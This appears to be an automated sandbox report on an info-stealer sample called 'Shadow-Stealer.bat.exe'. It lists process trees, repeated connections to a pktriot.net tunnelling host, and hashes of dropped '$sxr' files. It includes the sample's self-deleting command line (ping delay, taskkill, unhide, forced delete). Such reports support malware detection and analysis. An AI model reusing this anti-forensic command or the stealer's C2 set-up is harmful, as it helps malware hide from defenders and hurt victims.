C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5732 -ip 5732

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 476

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{bf65b796-427b-4c14-8060-f7bb17b83de9}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 688 -p 5532 -ip 5532

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{22216ce1-e38d-4ceb-89da-003019ff7b6a}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5532 -s 312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6064 -ip 6064

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 476

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 408 -p 3732 -ip 3732

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3732 -s 940

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

MD5 0e9ccd796e251916133392539572a374
SHA1 eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256 c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512 e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

memory/5052-4-0x00007FF8641C3000-0x00007FF8641C5000-memory.dmp

memory/5052-14-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uee1a3a3.oxg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5052-5-0x000002877AC40000-0x000002877AC62000-memory.dmp

memory/5052-15-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/5052-16-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/5052-17-0x0000028700000000-0x0000028700024000-memory.dmp

memory/5052-19-0x00007FF884550000-0x00007FF88460D000-memory.dmp

memory/5052-18-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

memory/5052-20-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/5052-21-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/5052-22-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/5052-23-0x0000028700330000-0x0000028700D80000-memory.dmp

memory/5052-25-0x0000028700D80000-0x0000028700E26000-memory.dmp

memory/5052-26-0x0000028700E30000-0x0000028700E86000-memory.dmp

memory/5052-27-0x0000028700E90000-0x0000028700EE8000-memory.dmp

memory/5052-28-0x0000028700EF0000-0x0000028700F12000-memory.dmp

memory/5052-29-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

memory/5052-31-0x00000287011E0000-0x00000287011EA000-memory.dmp

memory/4804-32-0x0000000140000000-0x0000000140004000-memory.dmp

memory/5052-35-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/3852-36-0x0000000000400000-0x0000000000406000-memory.dmp

memory/4804-34-0x0000000140000000-0x0000000140004000-memory.dmp

memory/3852-40-0x0000000000400000-0x0000000000406000-memory.dmp

memory/5052-39-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 356e04e106f6987a19938df67dea0b76
SHA1 f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA256 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512 df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

memory/5052-50-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

C:\Windows\$sxr-cmd.exe

MD5 c5db7b712f280c3ae4f731ad7d5ea171
SHA1 e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256 f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512 bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

memory/3376-63-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

memory/3376-64-0x00007FF884550000-0x00007FF88460D000-memory.dmp

memory/3376-65-0x000001C72C3F0000-0x000001C72C976000-memory.dmp

memory/3376-66-0x000001C734A50000-0x000001C73521A000-memory.dmp

memory/3376-67-0x000001C735220000-0x000001C73565E000-memory.dmp

memory/3376-68-0x000001C735660000-0x000001C735712000-memory.dmp

memory/3376-69-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

memory/5052-75-0x00007FF8641C3000-0x00007FF8641C5000-memory.dmp

memory/3376-78-0x000001C72D2F0000-0x000001C72D340000-memory.dmp

memory/3376-79-0x000001C72D400000-0x000001C72D4B2000-memory.dmp

memory/3376-80-0x000001C72D690000-0x000001C72D852000-memory.dmp

memory/3376-89-0x000001C72D340000-0x000001C72D37C000-memory.dmp

memory/3376-90-0x000001C72D2A0000-0x000001C72D2EE000-memory.dmp

memory/3376-91-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

memory/5052-92-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

memory/3376-93-0x00007FF884550000-0x00007FF88460D000-memory.dmp

memory/3376-94-0x000001C72D380000-0x000001C72D3B6000-memory.dmp

memory/4656-95-0x0000000140000000-0x0000000140028000-memory.dmp

memory/4656-98-0x00007FF884550000-0x00007FF88460D000-memory.dmp

memory/4656-97-0x00007FF8855C0000-0x00007FF8857C9000-memory.dmp

memory/4656-96-0x0000000140000000-0x0000000140028000-memory.dmp

memory/608-102-0x0000028B30050000-0x0000028B30077000-memory.dmp

memory/980-114-0x00000143C5B10000-0x00000143C5B37000-memory.dmp

memory/980-115-0x00007FF845650000-0x00007FF845660000-memory.dmp

memory/976-128-0x000002CF9FB00000-0x000002CF9FB27000-memory.dmp

memory/1160-138-0x00007FF845650000-0x00007FF845660000-memory.dmp

memory/1160-137-0x0000023CB6AA0000-0x0000023CB6AC7000-memory.dmp

memory/1068-135-0x00007FF845650000-0x00007FF845660000-memory.dmp

memory/1068-134-0x00000268087B0000-0x00000268087D7000-memory.dmp

memory/1056-132-0x00007FF845650000-0x00007FF845660000-memory.dmp

memory/1056-131-0x000001E5698E0000-0x000001E569907000-memory.dmp

memory/976-129-0x00007FF845650000-0x00007FF845660000-memory.dmp

memory/456-119-0x00007FF845650000-0x00007FF845660000-memory.dmp

memory/456-118-0x0000019D7E9D0000-0x0000019D7E9F7000-memory.dmp

memory/696-112-0x00007FF845650000-0x00007FF845660000-memory.dmp

memory/428-110-0x00007FF845650000-0x00007FF845660000-memory.dmp

memory/428-109-0x0000020EE6940000-0x0000020EE6967000-memory.dmp

memory/608-107-0x00007FF845650000-0x00007FF845660000-memory.dmp

memory/696-104-0x00000202CE2F0000-0x00000202CE317000-memory.dmp

memory/608-101-0x0000028B2FDD0000-0x0000028B2FDF2000-memory.dmp

memory/4656-99-0x0000000140000000-0x0000000140028000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.3de27bd6-27d3-4e8b-8fb8-ed8767f6d008.tmp.csv

MD5 7063770dc9c0bfd9224d259979ff24d0
SHA1 996fa6a4cd8dbe3e95e22642a2d6896c5024a8f1
SHA256 3221a00201b27de4df7a6156b6c9d1beb8f431584f4ffcce1b010ecbb27fc738
SHA512 75e8a4499fb9e1eeed31dfccc247d115c26887498b6ba6ad28a96c93974ab33513072805a1c6e43f19ecfc9e89283da7040a55b155fd144827b5901d3ed37481

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6f8a75da-a379-4005-81bb-d5cfc52bf66b.tmp.txt

MD5 5b8b8068b70178bdd1483260e217005f
SHA1 d86c188fa292eb90dbbea10dc436f08a4f4b7d7d
SHA256 dbbdee25e509424692054df561c393aaae51ee8fb80b873323a15152b1b4bde7
SHA512 d54e6140a28c4575ab98be30e4290cf4defdb873214379f58c651e496c79ea94572369133945510b7d54d6e63e71c3711f4c02ef360d4212996e199fb84867dc

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.b7dc8a3a-917a-4108-aa68-babea3ea7976.tmp.csv

MD5 5084e8d0b89b8deb8fe1332866c55c28
SHA1 310daebcc4d4a1c3f596826324ca3444786f3b56
SHA256 a1ab8d1104743938c60543f0d869ba6810a0918f39f2ff75b61791ecb9e33429
SHA512 fa21f03f09d6095ab1d60907c56f2a8025931df311c2fabfa631d2c348b3fa9d66e5c5e17b7d1f5ee09d464d415dd8d949a79db10da47d9df61418f4ea67b589

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.b887b74b-fc56-4986-9735-6b2e57235bca.tmp.txt

MD5 48a532728c1b15dc689bc65579f7117d
SHA1 2b8ed745721c0152553a6a9a6d7d2df023dd605b
SHA256 8a79d5b5dfd9cc891678e5fd58f229dc3aadaceec769d435dc1ca3dc1611764b
SHA512 bb2141c3966062351b85406d45845039a7c292efcf7617e5e35ebffde2b705bb6c1005920326b26ba22b57115ecd387d0c2e2cf682b1e0c8af87f966fd68c245

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ada51214-6507-4896-8df6-667eb1b78be9.tmp.csv

MD5 01cb1d4788f45c401ab79452e5ba54c8
SHA1 f5044f4415229350f313551c3d8221a7775e5767
SHA256 5225483c288be5934f80e3da246bc20f49b8b85e87fd74d1e9e6c6fb229ecd2a
SHA512 1059a6e3a10dfa77ecf8cea94734f6787adca0a3ef9663c620029047ea8a52d32114a7d98057e875dc711d15e0da577e4efbf76eb8d0ac78a1fea40a16d0232f

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bb5d6639-1f2b-4ff2-b97d-0a444c98fe71.tmp.txt

MD5 068d45478c1a2de352808afef100814e
SHA1 b41065c9ffe1cb525da16aa856c2cfaafce2d82f
SHA256 9947084d90b2627cd48ea3552cb24943dfacb1d54f72cde8724b0ac2fabd93bc
SHA512 f81bea8eb91462e1ca1298380cfdd9c446580c60b76b91bb86798d79c533548fc305378060e3d43e09dfcc1223b175d225f551163d026e67c61cbfa08675a403

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.96a06089-492f-42f6-b935-86a105cb6905.tmp.csv

MD5 95cb02d483fe046902d3b478920a5658
SHA1 a9a08b5aa0fe9d8e37d38d251df3b61cbeed027f
SHA256 0217b3642b98ee92d4947c252a6460b5a69723872819f2b553149e2035133f5b
SHA512 7c627629cf83d85b76f6fe9e2cd968dd1795627d81a6bb22fa451db63d40caa5d77533432313eaa65def4aa1b21756b53d3f8cf02e35c18e1eec9b1e1dcf7404

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6bc79591-81e3-462e-9757-2417cf610904.tmp.txt

MD5 13ef68fb4e61d63143470b36786c4484
SHA1 00007ae99e2ae4bf7e4e1fb15a7927d42c1b5fce
SHA256 1e1e523890db643d90d9beb9bd555c9e58569c4f4a5329d2c3170e5a6587ec11
SHA512 52f81da16f8267940caf756eb2f6978a2984311a3e5e8fc70050b72d6ab81e018c78f567e507cfed1c8338efeb0df71938146ac0ed33751b2850888fdcc266f3

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.13525c67-d246-49b1-9cc9-aaea80c983f7.tmp.csv

MD5 120dfd230113d7564374f16309415b42
SHA1 43a47aad948a8439c582fe61b7aa90595254870c
SHA256 b2efe62d0970e670457d53676caee2888956ebaa66450fac9d45a2e4301b4bde
SHA512 6bd90034fdcdaf9b6f738c1bc72e1639affb8f595194263f318366d36c2019fd32000afe6bb407e25fc4718bc099efcff1ab4bd431f712dff498cee7f0033d44

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d196a0d9-62fe-4327-b08f-bb9ff5b1ec9b.tmp.txt

MD5 4d5b955f5cd01bc211f1a5171b206ada
SHA1 b22825b3ec9c7e68801fad0bc4ee8e351446c95c
SHA256 e53e8975b34fc62b24856588b1642cef8db319125bdb05b6c5793b11516379c6
SHA512 6b8330d266ce448a955283a5736f1eb9f6c5065d9b76e4b38500af9a38723745fc887f7b60270a68cd4fcd28468f4872076f7bd19b5eb924a64c14394f8b67b0

memory/5052-1533-0x00007FF8641C0000-0x00007FF864C82000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 cb9ee6118f51a0a5430cca6cbc4e2df8
SHA1 231c6223dee2094738bd65210e56dddfde19ebf9
SHA256 7e134f47993f776d4000d86c6940491bf682735097997d3df713592a83267404
